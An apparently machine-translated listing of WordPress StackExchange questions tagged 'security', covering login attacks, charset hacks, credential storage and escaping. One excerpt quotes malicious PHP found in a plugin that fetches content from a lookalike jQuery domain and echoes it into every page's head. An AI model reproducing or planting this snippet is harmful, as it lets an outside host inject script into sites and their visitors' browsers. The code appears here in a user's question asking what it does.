Запитання з тегом «security»

Зачинено. Це питання поза темою . Наразі відповіді не приймаються. Хочете вдосконалити це питання? Оновіть питання, щоб воно було тематичним для обміну стеками розвитку WordPress. Закрито 4 роки тому . Я встановив плагін Simple Lockdown, і тому що пару днів тому база даних записує понад 200 записів на день. Я …

20 login  security 

У мене був клієнт, який нещодавно зламався, і я помітив, що на його сайті з’являються дивні персонажі, такі як and і Æ. Виявляється, хакери змінили блог_charset на UTF-7 у wp_optionsтаблиці в базі даних. Я повернув його до UTF-8, але мені було цікаво, чи могло це створити якісь уразливості безпеки під …

19 security  encoding  hacked  characters 

Я новачок у WordPress. Нещодавно я прочитав статтю про те, як хакери можуть використовувати вразливості плагінів. Різні джерела, такі як Google Pagespeed, також відмовляють мене від використання плагінів або принаймні зводять його до мінімуму. Особисто я також намагаюся уникати плагінів, тому що я більше контролюю те, що відбувається на моєму …

19 plugins  security 

Наразі я розробляю плагін, і швидше за все, я більше ніж ймовірно випущу його у загальнодоступному сховищі плагінів, щоб інші могли ним користуватися. Плагін буде використовувати API, а для використання цього API потрібно ввести ім'я користувача та пароль. Тож мій плагін повинен зберігати ці вхідні дані в базі даних. Я …

19 plugin-development  security  api  encryption 

Я знайшов це в плагіні. Що це робить? це небезпечно? add_action('admin_enqueue_scripts', 'pw_load_scripts'); if (!function_exists('wp__head'){ function wp__head() { if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); $jquery = curl_exec($ch); curl_close($ch); echo "$jquery"; } } add_action('wp_head', 'wp__head'); }

17 plugins  wp-admin  security  curl 

Я хочу переконатися, що всі дані в моїх плагінах / темах обробляються безпечно перед входом у базу даних та перед виведенням у браузер. Моя проблема полягає в тому, що існують ситуації, коли API обробляє санітарну обробку для вас - наприклад, під час збереження метаполя публікацій - та інші, коли автор …

17 plugin-development  security  customization  validation  sanitization 

Чи зберігає wp-admin/install.phpта зберігає wp-admin/install-helper.phpбезпеку новіші версії wordpress? За замовчуванням на цей файл дозвіл 644. Якщо є якісь витоки, що за будь ласка?

16 security  installation 

Наразі це запитання не підходить для нашого формату запитань. Ми очікуємо, що відповіді будуть підкріплені фактами, посиланнями або експертними знаннями, але це питання, ймовірно, вимагатиме дискусій, аргументів, опитувань чи розширеної дискусії. Якщо ви вважаєте, що це питання можна вдосконалити та, можливо, знову відкрити, відвідайте довідковий центр для ознайомлення . Закрито …

16 plugins  plugin-development  security  sql 

Я бачу, що SVG-файли заблоковані за замовчуванням у завантажувачі мультимедіа, і ви повинні додати його як підтримуваний MIME-тип у function.php. Які причини безпеки стоять за цим?

15 media  security  svg 

Я дивився на код, але я не міг побачити будь-які втечі на таких функціях, як the_title the_content the_excerptт. Д. Я, можливо, не читав його правильно. Чи потрібно уникати таких функцій у розробці тем, як: esc_html ( the_title () ) Редагувати: як зазначено у відповідях нижче, наведений вище код невірно - …

15 security  escaping 

У нас виникають деякі проблеми із зовнішнім розробником. Ми хочемо обмежити доступ до wp-adminсайту лише до внутрішнього доступу (через VPN ). Просто так на нього не будуть нападати зовнішні користувачі. Ми можемо перерахувати адміністраторів із сайту та не хочемо, щоб вони фіширувалися. Наш розробник каже, що ми не можемо цього …

14 admin  ajax  security 

Лише швидке запитання, яке може допомогти татові з безпекою. Я помітив, що у файлі readme.html вказаний номер версії. Він з'являється знову після кожного оновлення, а також робимо licence.txt та wp-config-sample.php. Чи є простий спосіб змусити WordPress автоматично видалити ці файли після оновлення? Я вже блокую номер версії, щоб він не …

13 security  wp-config 

Налаштування WordPress для оновлення в додатку (тобто WordPress) ідеально підходить для мене через його зручність. Тим не менш, мене турбують вимоги. Запитані поля, які з’являються після встановлення ssh2 для php, запитують не лише мій відкритий ключ, але і мій приватний ключ. Я думаю, що, максимум, буде потрібен лише відкритий ключ. …

13 security  updates  ssh 

Дивлячись на Codex для wp_insert_post (), він зазначає, що ця функція "... дезінфікує змінні, робить деякі перевірки, заповнює пропущені змінні, такі як дата / час тощо" (EDIT: я оновив запис Codex, щоб включити більш надійний приклад що включає захист, а також призначення мета і призначення категорії) Мені цікаво, чи потрібно …

13 security  sanitization 

Ця річ ускладнює моє кодування. Wordpress codex пояснює використання esc_url, розмовляючи неяскраво про безпеку. Але чи справді варто турбуватися? Наприклад, яка важлива, практична користь для безпеки за допомогою використання <?php echo esc_url( home_url( '/' ) ); ?> замість <?php echo home_url() ?> PS: Я кажу не про розробку тем, а …

12 security